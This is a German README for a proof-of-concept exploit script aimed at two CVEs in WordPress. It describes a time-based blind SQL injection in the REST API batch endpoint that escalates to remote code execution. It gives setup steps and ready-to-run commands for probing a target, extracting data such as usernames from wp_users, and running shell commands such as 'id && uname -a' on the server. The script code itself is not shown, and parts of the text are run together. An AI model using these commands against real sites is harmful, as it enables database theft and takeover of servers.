
CVE-2026-63030 & CVE-2026-60137 Wp2shell Poc
poc_wp_tot.py ist ein Proof‑of‑Concept (PoC) zur Ausnutzung einer
zeitbasierten Blind-SQL-Injection-Schwachstelle im WordPress REST API Batch-Endpunkt und
zur Durchführung einer Eskalationskette bis hin zur Remote Code Execution (RCE).
poc_wp_tot.py in Ihr Arbeitsverzeichnis.python3 -m venv venv
source venv/bin/activate

Das Skript bietet drei Betriebsmodi: Probe (Erkennung), Extract (Datenabruf) und RCE (Befehlsausführung). Nachfolgend einige Anwendungsbeispiele.
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : Hilfe anzeigen-v, --verbose: Ausführliche Ausgabe aktivieren (Debug)-c <BEFEHL> : RCE-Modus — Shell-Befehl auf dem Ziel ausführenSLEEP() ausführen,
und zwar als boolesche Bedingung (zeitbasierte Blind‑SQLi).poc_wp_tot.py.calibrate(), get_scalar()
und exploit_rce() im Skript.